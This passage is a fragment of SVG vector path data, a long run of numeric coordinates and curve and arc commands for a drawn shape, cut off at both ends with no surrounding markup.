.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6